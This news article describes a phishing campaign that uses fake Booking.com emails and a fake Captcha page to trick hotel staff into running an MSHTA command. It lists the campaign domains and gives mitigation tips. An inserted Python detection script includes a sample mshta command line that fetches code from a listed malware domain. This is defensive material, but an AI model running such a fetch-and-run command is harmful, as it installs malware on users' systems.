
Hackers using fake Booking.com site to target the hospitality industry, security researchers warn

  • Marijan Hassan - Tech Journalist
  • 5 days ago
  • 2 min read

Updated: 4 days ago

Security researchers at Malwarebytes are raising the alarm about a new phishing campaign that leverages the well-known Booking.com brand to target hotels, potentially compromising sensitive guest data. Cybercriminals are employing sophisticated tactics, including fake Captcha websites, to trick hotel staff into infecting their systems with malware.



How it works

The attack begins with a deceptive email, seemingly sent from Booking.com, urging hotel staff to confirm a booking.


The link in the email redirects to a fake Captcha website. By the time the page is displayed, the website has already secretly loaded a malicious MSHTA command into the user's computer clipboard. Then, when the user ticks the Captcha checkbox, they are prompted to complete a series of "Verification Steps."



These instructions are the core of the deception, as they guide the victim to paste the copied malicious command directly into a Windows command prompt and execute it.


Running this command triggers an attack chain that downloads and executes a remote file, ultimately leading to the hotel's systems being infected with a Trojan. A compromised hotel network is lucrative for cybercriminals, granting them access to valuable payment details and other personal information of guests, which can then be exploited or sold on the dark web.



Malwarebytes has identified the following domains associated with this ongoing campaign:

  • Vencys[.]com - Appears in the initial phishing email and redirects to the fake Captcha site

  • Bokcentrpart[.]com - Hosts the deceptive fake Captcha website

  • captpart[.]info - The server from which the malware is downloaded
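
A triage check for the behaviour described above, added here as an example and not taken from Malwarebytes or the article: it flags process-creation events where mshta.exe is started with a remote URL (and notes when the parent is the command prompt), and matches URL hosts against the three listed domains. The event field names (`image`, `parent_image`, `command_line`), the finding labels and the sample events are assumptions constructed for illustration.

```python
import re

# Campaign domains exactly as the article lists them (kept defanged in source).
CAMPAIGN_DOMAINS_DEFANGED = ["Vencys[.]com", "Bokcentrpart[.]com", "captpart[.]info"]

def refang(indicator):
    """Convert a defanged indicator such as example[.]com into matchable form."""
    return indicator.replace("[.]", ".").lower()

CAMPAIGN_DOMAINS = {refang(d) for d in CAMPAIGN_DOMAINS_DEFANGED}
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)

def is_campaign_host(host):
    """True for a listed domain or any subdomain of it, not for look-alike suffixes."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in CAMPAIGN_DOMAINS)

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def triage(event):
    """Return findings for one process-creation event (field names are assumed)."""
    findings = []
    hosts = URL_HOST.findall(event["command_line"])
    if basename(event["image"]) == "mshta.exe" and hosts:
        findings.append("mshta-remote-url")  # mshta fetching remote content
        if basename(event["parent_image"]) == "cmd.exe":
            findings.append("mshta-from-command-prompt")  # the paste-and-run step
    if any(is_campaign_host(h) for h in hosts):
        findings.append("campaign-domain")
    return findings

# Constructed sample events; paths and the PLACEHOLDER URL path are illustrative.
SYS32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [
    {"image": SYS32 + "mshta.exe", "parent_image": SYS32 + "cmd.exe",
     "command_line": "mshta.exe https://" + refang("captpart[.]info") + "/PLACEHOLDER"},
    {"image": SYS32 + "mshta.exe", "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "mshta.exe C:\\Apps\\inventory.hta"},
    {"image": "C:\\Program Files\\Browser\\browser.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "browser.exe https://" + refang("Vencys[.]com") + "/PLACEHOLDER"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev), "<-", ev["command_line"])
```

The mshta rule does not depend on the domain list, so it still fires if the campaign moves to new infrastructure.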


Protection and mitigation

To protect themselves and their customers, hotels and individuals should remain vigilant and adopt the following security practices:



  • Be wary of urgent emails: Never blindly trust emails that demand immediate action. If Booking.com genuinely needs confirmation, log in to the platform directly through the official website or app.


  • Verify the sender's domain: Always scrutinize the sender's email address. Legitimate emails from Booking.com will originate from the official booking.com domain.

  • Avoid clicking suspicious links: Exercise caution when clicking on links in emails, especially if they ask for verification or sensitive information.

  • Never run copied commands without understanding them: Be extremely cautious about pasting and executing commands in the Windows command prompt, especially if instructed to do so by an email or website.


  • Implement security training: Hotels should provide comprehensive security awareness training to their staff to help them recognize and avoid social engineering attacks like this.
